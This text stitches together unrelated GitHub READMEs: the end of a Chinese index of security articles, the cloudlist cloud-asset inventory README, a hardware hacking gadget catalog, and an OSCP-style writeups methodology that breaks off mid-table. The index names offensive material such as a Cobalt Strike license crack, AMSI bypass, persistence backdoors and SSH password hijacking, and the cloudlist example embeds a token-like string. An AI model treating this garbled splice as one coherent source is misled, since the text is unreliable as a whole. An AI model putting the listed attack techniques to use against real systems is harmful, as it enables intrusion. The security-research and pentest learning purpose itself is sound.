[44139-mysql-udf-exploitation](./books/44139-mysql-udf-exploitation.pdf) - [emlog CMS的代码审计_越权到后台getshell](./books/emlog%20CMS的代码审计_越权到后台getshell%20-%20先知社区.pdf) - [PHPOK 5.3 最新版前台注入](./books/PHPOK%205.3%20最新版前台注入%20-%20先知社区.pdf) - [PHPOK 5.3 最新版前台无限制注入(二)](./books/PHPOK%205.3%20最新版前台无限制注入(二)%20-%20先知社区.pdf) - [Thinkphp5 RCE总结](./books/Thinkphp5%20RCE总结%20_%20ChaBug安全.pdf) - [rConfig v3.9.2 RCE漏洞分析](./books/rConfig%20v3.9.2%20RCE漏洞分析.pdf) - [weiphp5.0 cms审计之exp表达式注入](./books/weiphp5.0%20cms审计之exp表达式注入%20-%20先知社区.pdf) - [zzzphp1.7.4&1.7.5到处都是sql注入](./books/zzzphp1.7.4%261.7.5到处都是sql注入.pdf) - [FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor](./books/FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor.pdf) - [zzcms 2019 版本代码审计](./books/zzcms%202019%E7%89%88%E6%9C%AC%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%20-%20%E5%85%88%E7%9F%A5%E7%A4%BE%E5%8C%BA.pdf) - [利用SQLmap 结合 OOB 技术实现音速盲注](./books/手把手带你利用SQLmap结合OOB技术实现音速盲注.pdf) - [特权提升技术总结之Windows文件服务内核篇(主要是在webshell命令行执行各种命令搜集信息)](https://xz.aliyun.com/t/7261)|[(项目留存PDF版本)](./books/特权提升技术总结之Windows文件服务内核篇%20-%20先知社区.pdf) - [WellCMS 2.0 Beta3 后台任意文件上传](./books/WellCMS%202.0%20Beta3%20后台任意文件上传.pdf) - [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs) - [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) - [表达式注入.pdf](./books/表达式注入.pdf) - [WordPress ThemeREX Addons 插件安全漏洞深度分析](./books/WordPress%20ThemeREX%20Addons%20插件安全漏洞深度分析.pdf) - [通达OA文件包含&文件上传漏洞分析](./books/通达OA文件包含&文件上传漏洞分析.pdf) - [高级SQL注入:混淆和绕过](./books/高级SQL注入:混淆和绕过.pdf) - [权限维持及后门持久化技巧总结](./books/权限维持及后门持久化技巧总结.pdf) - [Windows常见的持久化后门汇总](./books/Windows常见的持久化后门汇总.pdf) - [Linux常见的持久化后门汇总](./books/Linux常见的持久化后门汇总.pdf) - [CobaltStrike4.0用户手册_中文翻译_3](./books/CobaltStrike4.0用户手册_中文翻译_3.pdf) - [Cobaltstrike 4.0之 我自己给我自己颁发license.pdf](./books/Cobaltstrike%204破解之%20我自己给我自己颁发license.pdf) - [Cobalt Strike 4.0 更新内容介绍](./books/Cobalt%20Strike%204.0%20更新内容介绍.pdf) - [Cobal_Strike_自定义OneLiner](./books/Cobal_Strike_自定义OneLiner_Evi1cg's_blog.pdf) - [cobalt strike 快速上手 [ 一 ]](./books/cobalt_strike_快速上手%5B%20一%20%5D.pdf) - [Cobalt strike3.0使用手册](./books/Cobalt_strike3.0使用手册.pdf) - [Cobalt_Strike_Spear_Phish_CS邮件钓鱼制作](./books/Cobalt_Strike_Spear_Phish_Evi1cg's%20blog%20%20CS邮件钓鱼制作.md) - [Remote NTLM relaying through CS](./books/Remote_NTLM_relaying_through_CS.pdf) - [渗透测试神器Cobalt Strike使用教程](./books/渗透测试神器Cobalt%20Strike使用教程.pdf) - [Cobalt Strike的teamserver在Windows上快速启动脚本](./books/CS_teamserver_win.md) - [ThinkPHP v6.0.0_6.0.1 任意文件操作漏洞分析](./books/ThinkPHP%20v6.0.0_6.0.1%20任意文件操作漏洞分析.pdf) - [Django_CVE-2020-9402_Geo_SQL注入分析](./books/Django_CVE-2020-9402_Geo_SQL注入分析.pdf) - [CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行](./books/CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行.pdf) - [安全狗SQL注入WAF绕过](./books/安全狗SQL注入WAF绕过.pdf) - [通过将JavaScript隐藏在PNG图片中,绕过CSP](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) - [通达OA任意文件上传_文件包含GetShell](./books/通达OA任意文件上传_文件包含GetShell.pdf) - [文件上传Bypass安全狗4.0](./books/文件上传Bypass安全狗4.0.pdf) - [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf) - [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf) - [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI) - [bypass云锁注入测试](./books/bypass云锁注入测试.md) - [360webscan.php_bypass](./books/360webscan.php_bypass.pdf) - [think3.2.3_sql注入分析](./books/think3.2.3_sql注入分析.pdf) - [UEditor SSRF DNS Rebinding](./books/UEditor%20SSRF%20DNS%20Rebinding) - [PHP代码审计分段讲解](https://github.com/bowu678/php_bugs) - [京东SRC小课堂系列文章](https://github.com/xiangpasama/JDSRC-Small-Classroom) - [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf) - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf) - [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn) - [PAM劫持SSH密码](./PAM劫持SSH密码.md) - [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/) - [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf) - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack) - [PbootCMS审计](./books/PbootCMS审计.pdf) - [De1CTF2020系列文章](https://github.com/De1ta-team/De1CTF2020) - [xss-demo-超级简单版本的XSS练习demo](https://github.com/haozi/xss-demo) - [空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透](./books/空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透.pdf) - [入门KKCMS代码审计](./books/入门KKCMS代码审计.pdf) - [SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 checklist](https://github.com/LandGrey/SpringBootVulExploit) - [文件上传突破waf总结](./books/文件上传突破waf总结.pdf) - [极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872) - [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf) - [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md) - [文件上传内容检测绕过](./books/文件上传内容检测绕过.md) - [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf) - [【Android脱壳】_腾讯加固动态脱壳(上篇)](./books/移动安全(九)_TengXun加固动态脱壳(上篇).pdf) - [【Android脱壳】腾讯加固动态脱壳(下篇)](./books/移动安全(十)_TengXun加固动态脱壳(下篇).pdf) - [【Android脱壳】记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务](./books/记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务.pdf) - [【Android抓包】记一次APP测试的爬坑经历.pdf](./books/记一次APP测试的爬坑经历.pdf) - [完整的内网域渗透-暗月培训之项目六](./books/完整的内网域渗透-暗月培训之项目六.pdf) - [Android APP渗透测试方法大全](./books/Android%20APP渗透测试方法大全.pdf) - [App安全检测指南-V1.0](./books/App安全检测指南-V1.0.pdf) - [借github上韩国师傅的一个源码实例再次理解.htaccess的功效](./books/借github上韩国师傅的一个源码实例再次理解.htaccess的功效.pdf) - [Pentest_Note-渗透Tips,总结了渗透测试常用的工具方法](https://github.com/xiaoy-sec/Pentest_Note) - [红蓝对抗之Windows内网渗透-腾讯SRC出品](./books/红蓝对抗之Windows内网渗透-腾讯SRC出品.pdf) - [远程提取Windows中的系统凭证](./books/远程提取Windows中的系统凭证.pdf) - [绕过AMSI执行powershell脚本](./books/绕过AMSI执行powershell脚本.md)|[AmsiScanBufferBypass-相关项目](https://github.com/rasta-mouse/AmsiScanBufferBypass) - [踩坑记录-Redis(Windows)的getshell](./books/踩坑记录-Redis(Windows)的getshell.pdf) - [Cobal_Strike踩坑记录-DNS Beacon](./books/Cobal_Strike踩坑记录-DNS%20Beacon.pdf) - [windows下隐藏webshell的方法](./books/windows下隐藏webshell的方法.md) - [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析 (三) 碰撞点.pdf) ## <span id="head9"> 说明</span> > 此项目所有文章、代码部分来源于互联网,版权归原作者所有,此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任! ![](https://ooo.0o0.ooo/2017/06/13/593fb9335fe9c.jpg)
<h1 align="center"> <img src="static/cloudlist-logo.png" alt="cloudlist" width="400px"></a> <br> </h1> <p align="center"> <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a> <a href="https://github.com/projectdiscovery/cloudlist/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://goreportcard.com/badge/github.com/projectdiscovery/cloudlist"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/cloudlist"></a> <a href="https://github.com/projectdiscovery/cloudlist/releases"><img src="https://img.shields.io/github/release/projectdiscovery/cloudlist"></a> <a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> </p> <p align="center"> <a href="#features">Features</a> • <a href="#installation-instructions">Installation</a> • <a href="#usage">Usage</a> • <a href="#configuration-file">Configuration</a> • <a href="#running-cloudlist">Running cloudlist</a> • <a href="#supported-providers">Supported providers</a> • <a href="#cloudlist-as-a-library">Library</a> • <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> Cloudlist is a multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts. # Features <h1 align="left"> <img src="static/cloudlist-run.png" alt="cloudlist" width="700px"></a> <br> </h1> - List Cloud assets with multiple configurations - Multiple Cloud providers support - Multiple output format support - Multiple filters support - Highly extensible making adding new providers a breeze - **stdout** support to work with other tools in pipelines # Usage ```sh cloudlist -h ``` This will display help for the tool. Here are all the switches it supports. ```yaml Usage: ./cloudlist [flags] Flags: CONFIGURATION: -config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml") -pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml") FILTERS: -p, -provider string[] display results for given providers (comma-separated) -id string[] display results for given ids (comma-separated) -host display only hostnames in results -ip display only ips in results -ep, -exclude-private exclude private ips in cli output OUTPUT: -o, -output string output file to write results -json write output in json format -version display version of cloudlist -v display verbose output -silent display only results in output ``` # Installation Instructions Download the ready to use binary from [release page](https://github.com/projectdiscovery/cloudlist/releases/) or install/build using Go ```sh go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest ``` # Running Cloudlist ``` cloudlist ``` This will list all the assets from configured providers in the configuration file. Specific providers and asset type can also be specified using `provider` and `id` filter. ```console cloudlist -provider aws,gcp ________ _____ __ / ____/ /___ __ ______/ / (_)____/ /_ / / / / __ \/ / / / __ / / / ___/ __/ / /___/ / /_/ / /_/ / /_/ / / (__ ) /_ \____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [INF] Listing assets from AWS (prod) provider. example.com example2.com example3.com 1.1.1.1 2.2.2.2 3.3.3.3 4.4.4.4 5.5.5.5 6.6.6.6 [INF] Found 2 hosts and 6 IPs from AWS service (prod) ``` ## Running cloudlist with Nuclei Scanning assets from various cloud providers with nuclei for security assessments:- ```bash cloudlist -silent | httpx -silent | nuclei -t cves/ ``` # Supported providers - AWS (Amazon web services) - EC2 - Route53 - S3 - GCP (Google Cloud Platform) - Cloud DNS - GKE - DO (DigitalOcean) - Instances - SCW (Scaleway) - Instances - Fastly - Services - Heroku - Applications - Linode - Instances - Azure - Virtual Machines - Namecheap - Domain List - Alibaba Cloud - ECS Instances - Cloudflare - DNS - Hashistack - Nomad - Consul - Terraform - Hetzner Cloud - Instances - Openstack - Instances - Kubernetes - Services - Ingresses # Configuration file The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to updated in the config file for the desired providers. <details> <summary>Example Provider Config</summary> ```yaml - provider: do # provider is the name of the provider # id is the name defined by user for filtering (optional) id: xxxx # digitalocean_token is the API key for digitalocean cloud platform digitalocean_token: $DIGITALOCEAN_TOKEN - provider: scw # provider is the name of the provider # scaleway_access_key is the access key for scaleway API scaleway_access_key: $SCALEWAY_ACCESS_KEY # scaleway_access_token is the access token for scaleway API scaleway_access_token: $SCALEWAY_ACCESS_TOKEN - provider: aws # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # aws_access_key is the access key for AWS account aws_access_key: $AWS_ACCESS_KEY # aws_secret_key is the secret key for AWS account aws_secret_key: $AWS_SECRET_KEY # aws_session_token session token for temporary security credentials retrieved via STS (optional) aws_session_token: $AWS_SESSION_TOKEN - provider: gcp # provider is the name of the provider # profile is the name of the provider profile id: logs # gcp_service_account_key is the minified json of a google cloud service account with list permissions gcp_service_account_key: '{xxxxxxxxxxxxx}' - provider: azure # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # client_id is the client ID of registered application of the azure account (not requuired if using cli auth) client_id: $AZURE_CLIENT_ID # client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth) client_secret: $AZURE_CLIENT_SECRET # tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth) tenant_id: $AZURE_TENANT_ID #subscription_id is the azure subscription id subscription_id: $AZURE_SUBSCRIPTION_ID #use_cli_auth if set to true cloudlist will use azure cli auth use_cli_auth: true - provider: cloudflare # provider is the name of the provider # email is the email for cloudflare email: $CF_EMAIL # api_key is the api_key for cloudflare api_key: $CF_API_KEY # api_token is the scoped_api_token for cloudflare (optional) api_token: $CF_API_TOKEN - provider: heroku # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # heroku_api_token is the api key for Heroku account heroku_api_token: $HEROKU_API_TOKEN - provider: linode # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # linode_personal_access_token is the personal access token for linode account linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN - provider: fastly # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # fastly_api_key is the personal API token for fastly account fastly_api_key: $FASTLY_API_KEY - provider: alibaba # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # alibaba_region_id is the region id of the resources alibaba_region_id: $ALIBABA_REGION_ID # alibaba_access_key is the access key ID for alibaba cloud account alibaba_access_key: $ALIBABA_ACCESS_KEY # alibaba_access_key_secret is the secret access key for alibaba cloud account alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET - provider: namecheap # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # namecheap_api_key is the api key for namecheap account namecheap_api_key: $NAMECHEAP_API_KEY # namecheap_user_name is the username of the namecheap account namecheap_user_name: $NAMECHEAP_USER_NAME - provider: terraform # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging #tf_state_file is the location of terraform state file (terraform.tfsate) tf_state_file: path/to/terraform.tfstate - provider: hetzner # provider is the name of the provider # id is the name defined by user for filtering (optional) id: staging # auth_token is the is the hetzner authentication token auth_token: $HETZNER_AUTH_TOKEN - provider: nomad # provider is the name of the provider # nomad_url is the url for nomad server nomad_url: http:/127.0.0.1:4646/ # nomad_ca_file is the path to nomad CA file # nomad_ca_file: <path-to-ca-file>.pem # nomad_cert_file is the path to nomad Certificate file # nomad_cert_file: <path-to-cert-file>.pem # nomad_key_file is the path to nomad Certificate Key file # nomad_key_file: <path-to-key-file>.pem # nomad_token is the nomad authentication token # nomad_token: <nomad-token> # nomad_http_auth is the nomad http auth value # nomad_http_auth: <nomad-http-auth-value> - provider: consul # provider is the name of the provider # consul_url is the url for consul server consul_url: http://localhost:8500/ # consul_ca_file is the path to consul CA file # consul_ca_file: <path-to-ca-file>.pem # consul_cert_file is the path to consul Certificate file # consul_cert_file: <path-to-cert-file>.pem # consul_key_file is the path to consul Certificate Key file # consul_key_file: <path-to-key-file>.pem # consul_http_token is the consul authentication token # consul_http_token: <consul-token> # consul_http_auth is the consul http auth value # consul_http_auth: <consul-http-auth-value> - provider: openstack # provider is the name of the provider # id is the name of the provider id id: staging # identity_endpoint is Openstack identity endpoint used to authenticate identity_endpoint: $OS_IDENTITY_ENDPOINT # domain_name is Openstack domain name used to authenticate domain_name: $OS_DOMAIN_NAME # tenant_name is Openstack project name tenant_name: $OS_TENANT_NAME # username is Openstack username used to authenticate username: $OS_USERNAME # password is Openstack password used to authenticate password: $OS_PASSWORD - provider: kubernetes # provider is the name of the provider # id is the name of the provider id id: staging # kubeconfig_file is the path of kubeconfig file kubeconfig: path/to/kubeconfig # context is the context to be used from kubeconfig file context: <context-name> ``` </details> # Contribution Please check [PROVIDERS.md](https://github.com/projectdiscovery/cloudlist/blob/main/PROVIDERS.md) and [DESIGN.md](https://github.com/projectdiscovery/cloudlist/blob/main/DESIGN.md) to include support for new cloud providers in Cloudlist. - Fork this project - Create your feature branch (`git checkout -b new-provider`) - Commit your changes (`git commit -am 'Added new cloud provider'`) - Push to the branch (`git push origin new-provider`) - Create new Pull Request # Cloudlist as a library It's possible to use the library directly in your go programs. The following code snippets outline how to list assets from all or given cloud provider. ```go package main import ( "context" "log" "github.com/projectdiscovery/cloudlist/pkg/inventory" "github.com/projectdiscovery/cloudlist/pkg/schema" ) func main() { inventory, err := inventory.New(schema.Options{ schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"}, }) if err != nil { log.Fatalf("%s\n", err) } for _, provider := range inventory.Providers { resources, err := provider.Resources(context.Background()) if err != nil { log.Fatalf("%s\n", err) } for _, resource := range resources.Items { _ = resource // Do something with the resource } } } ``` ## Acknowledgments Thank you for inspiration * [Smogcloud](https://github.com/BishopFox/smogcloud) * [Cloudmapper](https://github.com/duo-labs/cloudmapper) ## License cloudlist is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team and licensed under [MIT](https://github.com/projectdiscovery/cloudlist/blob/main/LICENSE.md)
# The Hacker's Hardware Toolkit ![Awesome community](https://img.shields.io/badge/awesome-hacking-green.svg) ![Awesome Hacking](https://img.shields.io/badge/hardware-toolkit-red.svg) ![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg) <h1 align="center"> <br> <img src="./cover.png" alt="cover"> <br> </h1> The best collection of hardware gadgets for Red Team hackers, pentesters and security researchers! It includes more than one hundred of tools classified in eight different categories, to make it easier to search and to browse them. ![Any hacker has a lot of tools, like I do!](https://pbs.twimg.com/media/D5Y2EBmXsAA8lnt?format=jpg&name=4096x4096) <h2>Disclaimer:</h2> This is NOT a commercial catalog, even if it looks like that. I have no personal interest in selling any of the shown tools. I just want to share many of the tools which I have used for different hacking purposes. Any tool not available to be bought online, will be excluded from the catalog. All the tools show an approximate price and an online shop where you can buy it, since feel free to check for other better or cheaper shops in Internet. All the OCR codes include the link to an online shop which ships to Europe and of course are not malicious. Download the catalog in [PDF](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/blob/master/TheHackersHardwareToolkit.pdf) format. **Caution**: *This catalog can cause serious problems at home with your couple. Do not abuse it! Take some minutes before clicking on the "Buy Now" button!* ## Categories * [Mini Computers](#mini-computers) * [RF](#rf-hacking) * [Wi-Fi](#wi-fi) * [RFID / NFC](#rfid-nfc) * [HID / Keyloggers](#hid-keylog) * [Network](#network) * [BUS](#bus-hacking) * [Accesories](#accesories) ### Contents Category | Description ---- | ---- [Mini Computers](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | The best selection of handheld computers, mini motherboards, etc. The best tool to handle all the other hardware peripherals for your projects. [RF](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | The best tools for hacking, analyzing, modifiying or replaying any Radio Frequency signal. Tools for hacking wireless controllers, GPS, Cell phones, Satellite signals, etc. [Wi-Fi](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | The tookit for a Wi-Fi hacker like me. This tools allow to monitor mode sniffing, enumerating, injecting, etc. Some tools like deauther, and amplifiers should be only used in lab environments. [RFID / NFC](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | A nice collection of beginners and proffesional tools for researching about RFID and NFC technologies based in LF (low frequency) and HF (high frequency) contactless cards, tags and badgets. Hacking tools for access controls, garages, shops, etc. [HID / Keyloggers](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | HID (hardware input devices) like mouses and USB keyboards are open to a keystroke injection attack. Many of these devices like rubberducky, badusb, badusb ninja, etc. are increasing in capabilities and effectivity. Hardware keyloggers are still one of the best option for credentials capture. [Network](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | Small routers, taps, and other similar network devices based in Linux can be the perfect companion for an internal pentester. Here you will find many OpenWRT / LEDE based mini routers that can be customized for network intrusion. [BUS](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | Hardware hacking is one the most beautiful hacking categories. Since it's also one of the most complicated ones. There are many different bus technologies and protocols and a hardware hacker must own a lot of tools for discovering and 'speaking' with such buses. Some of the categories included here are: car hacking, motherboard and pcb hacking, industrial hacking, etc. [Accesories](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/) | Not only the previous tools are enough for creating your own hacking device. If you are going to build a functional system you'll also need a lot of accesories like batteries, chargers, gps, sensors, DC-DC, lab equipment, etc. ![First printed version of the catalog presented in HITB Amsterdam 2019](https://pbs.twimg.com/media/D5eKoHnXkAEfIfL?format=jpg&name=large) ### Contribution: Feel free to open a bug for correcting any description, any misspelled word, or just for including your own comments. But, if any comment seems to have a commercial interest it will be immediately dismissed. I want to keep it clean from external interests. You are welcome to contribute [contributing.md](https://github.com/yadox666/The-Hackers-Hardware-Toolkit/blob/master/contributing.md#contribution-guidelines) by opening a bug. ### To-do: - Add your feedback - Add your suggestions - Add an unboxing / getting started section on many items ### Need more info? Follow me on GitHub or on your favorite social media to get daily updates on interesting security news and GitHub repositories related to Security. - Twitter: [@yadox](https://twitter.com/yadox) - Linkedin: [Yago Hansen](https://www.linkedin.com/in/yadox/) - Personal Web: [Yago Hansen](https://yagohansen.com/) ### Want to get it paperback? I have also published this book in Amazon, because many people asked about getting a cheap paperback format. I kept the same policy to distribute it in a non-profit mode, so I kept the price as low as posible. It is available through all the Amazon international sites for many countries. If it's not available for shipping to your country, just feel free to download and print it using your own printing service. Book ISBN-10: 1099209463. - Amazon.com: [amazon.com](https://amzn.com/1099209463) License ---- Mozilla Public License 2.0 **Free for hackers, paid for commercial use!**
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menumerate) * ⚙️ [Phase 2: Exploit](#mexploit) * ⚙️ [Phase 3: PrivEsc](#mprivesc) - ☀️ [Stats](#stats) * 📊 [Counts](#counts) * 📊 [Top Categories](#topcategories) * 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices) * 📊 [Top TTPs](#topttps) - ⚡ [Mapping](#mapping) - 💥 [Machines](#machines) - ☢️ [TTPs](#ttps) * ⚙️ [Enumerate](#enumerate) * ⚙️ [Exploit](#exploit) * ⚙️ [PrivEsc](#privesc) - ⚡ [Tips](#tips) - 💥 [Tools](#tools) - 🔥 [Loot](#loot) * 🔑 [Credentials](#credentials) * 🔑 [Hashes](#hashes) <a name="methodology"></a> ## ☀️ Methodology [↟](#contents) <a name="mrecon"></a> ### ⚙️ Phase #0: Recon [🡑](#methodology) **Goal**: to scan all ports on &lt;targetip&gt; **Process**: * [enumerate_nmap_initial](#enumerate_nmap_initial) * [enumerate_nmap_tcp](#enumerate_nmap_tcp) * [enumerate_nmap_udp](#enumerate_nmap_udp) <a name="menumerate"></a> ### ⚙️ Phase #1: Enumerate [🡑](#methodology) **Goal**: to find service and version details **Process**: * find ttps for open ports * start with weird services * identify installed software and version * find critical cve/exploits * enumerate more common services - smb/ftp * enumerate services with large attack vector like http at the end <a name="mexploit"></a> ### ⚙️ Phase #2: Exploit [🡑](#methodology) **Goal**: gain interactive access on &lt;targetip&gt; **Process**: * debug available exploits for open ports <a name="mprivesc"></a> ### ⚙️ Phase #3: PrivEsc [🡑](#methodology) **Goal**: gain elevated privileges on &lt;targetip&gt; **Process**: * debug available exploits or misconfigurations * for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration) * for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) <a name="stats"></a> ## ☀️ Stats [↟](#contents) ### 📊 Counts [🡑](#stats) | # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned | |:--------:|:---------------:|:-----------------:|:-----------------:|:-----------------:|:-----------------:| | Total | `1/400 (0.25%)` | `25/222 (11.26%)` | `24/680 (3.53%)` | `46/254 (18.11%)` | `50/1302 (3.84%)` | | Windows | `0/0 (0.00%)` | `12/65 (18.46%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/67 (17.91%)` | | *nix | `0/0 (0.00%)` | `13/157 (8.28%)` | `24/678 (3.54%)` | `34/177 (19.21%)` | `37/835 (4.43%)` | | OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` | <a name="topcategories"></a> ### 📊 Top Categories [🡑](#stats) <img src="./top_categories.png" height="320" /> <a name="topportsprotocolsservices"></a> ### 📊 Top Ports/Protocols/Services [🡑](#stats) <img src="./top_ports.png" height="320" /> --- <img src="./top_protocols.png" height="320" /> --- <img src="./top_services.png" height="320" /> <a name="topttps"></a> ### 📊 Top TTPs [🡑](#stats) <img src="./top_ttps_enumerate.png" height="320" /> --- <img src="./top_ttps_exploit.png" height="320" /> --- <img src="./top_ttps_privesc.png" height="320" /> <a name="mapping"></a> ## ⚡ Mapping [↟](#contents) | # | Port | Service | TTPs | TTPs - ITW | |---|------|-----------|------|------------| | 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) | | 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | | | 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | | | 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | | | 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | | | 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br 